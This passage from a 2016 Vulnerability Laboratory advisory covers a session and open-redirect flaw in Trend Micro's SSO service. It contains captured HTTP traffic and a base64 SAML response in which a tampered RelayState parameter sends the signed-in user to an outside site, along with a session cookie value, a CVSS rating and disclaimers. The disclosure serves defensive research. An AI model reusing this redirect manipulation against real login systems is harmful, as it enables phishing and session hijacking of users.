DpBdWRpZW5jZVJlc3RyaWN0aW9uPjxzYW1sOkF1ZGllbmNlPm15YWNjb3VudC1zcDwvc2Ftb
DpBdWRpZW5jZT48L3NhbWw6QXVkaWVuY2VSZXN0cmljdGlvbj48L3NhbWw6Q29uZGl0aW9uc
z48c2FtbDpBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMTYtMDEtMjlUMTE6NTE6M
zlaIiBTZXNzaW9uTm90T25PckFmdGVyPSIyMDE2LTAxLTI5VDIwOjIwOjIzWiIgU2Vzc2lvb
kluZGV4PSJfNzRhNjY1Y2I5NmE2ZDY0ZTQyZmE1YjhkNTAyYmRkYTEwNzZkMTQyMDhmIj48c
2FtbDpBdXRobkNvbnRleHQ%2BPHNhbWw6QXV0aG5Db250ZXh0Q2xhc3NSZWY%2BdXJuOm9hc
2lzOm5hbWVzOnRjOlNBTUw6Mi4wOmFjOmNsYXNzZXM6UGFzc3dvcmQ8L3NhbWw6QXV0aG5Db
250ZXh0Q2xhc3NSZWY%2BPC9zYW1sOkF1dGhuQ29udGV4dD48L3NhbWw6QXV0aG5TdGF0ZW1
lbnQ%2BPHNhbWw6QXR0cmlidXRlU3RhdGVtZW50PjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc
2VyQWNjb3VudElEIiBOYW1lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6Y
XR0cm5hbWUtZm9ybWF0OmJhc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ie
HM6c3RyaW5nIj5zYW1pckBldm9sdXRpb24tc2VjLmNvbTwvc2FtbDpBdHRyaWJ1dGVWYWx1Z
T48L3NhbWw6QXR0cmlidXRlPjxzYW1sOkF0dHJpYnV0ZSBOYW1lPSJVc2VyQWNjb3VudE5hb
WUiIE5hbWVGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphdHRybmFtZS1mb
3JtYXQ6YmFzaWMiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlIHhzaTp0eXBlPSJ4czpzdHJpbmciP
nNhbWlyQGV2b2x1dGlvbi1zZWMuY29tPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBd
HRyaWJ1dGU%2BPHNhbWw6QXR0cmlidXRlIE5hbWU9IkNvbnN1bWVyQWNjb3VudElEIiBOYW1
lRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXR0cm5hbWUtZm9ybWF0OmJ
hc2ljIj48c2FtbDpBdHRyaWJ1dGVWYWx1ZSB4c2k6dHlwZT0ieHM6c3RyaW5nIj41MDE5NzM
3Mzwvc2FtbDpBdHRyaWJ1dGVWYWx1ZT48L3NhbWw6QXR0cmlidXRlPjwvc2FtbDpBdHRyaWJ
1dGVTdGF0ZW1lbnQ%2BPC9zYW1sOkFzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D]
RelayState[https%3A%2F%2Fyahoo.com%2Fmy_account%2F]
Response Headers:
Date[Fri, 29 Jan 2016 12:20:24 GMT]
Server[Apache]
Set-Cookie[SimpleSAMLAuthToken=_d3a3368aeec333b95a3983ed8eb76342a58992e2
1d;
path=/; httponly]
Location[https://yahoo.com/my_account/]
Pragma[no-cache]
Cache-Control[no-cache, must-revalidate]
Vary[Accept-Encoding]
Content-Encoding[gzip]
X-Frame-Options[SAMEORIGIN]
Content-Length[368]
Connection[close]
Content-Type[text/html; charset=UTF-8]
GET https://yahoo.com/my_account/ Load Flags[LOAD_DOCUMENT_URI
LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Content Size[382] Mime
Type[text/html]
Request Headers:
Host[yahoo.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0)
Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuse
rpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%
3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fs
pentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%
253A%252F%252Fyahoo.com%252Fmy_account%252F]
Cookie[B=]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 11:52:31 GMT]
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
Server[ATS]
Location[https://www.yahoo.com/my_account/]
Content-Type[text/html]
Content-Language[en]
Cache-Control[no-store, no-cache]
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.N
AAUqd6uR22UgXJ6WAAAAAA--]
Content-Length[382]
X-Firefox-Spdy[h2]
Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
trend micro sso online service web-application is estimated as high.
(CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] â?? Hadji Samir [Evolution
Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] -
research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab -
facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a
permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]â?¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
[ reply ]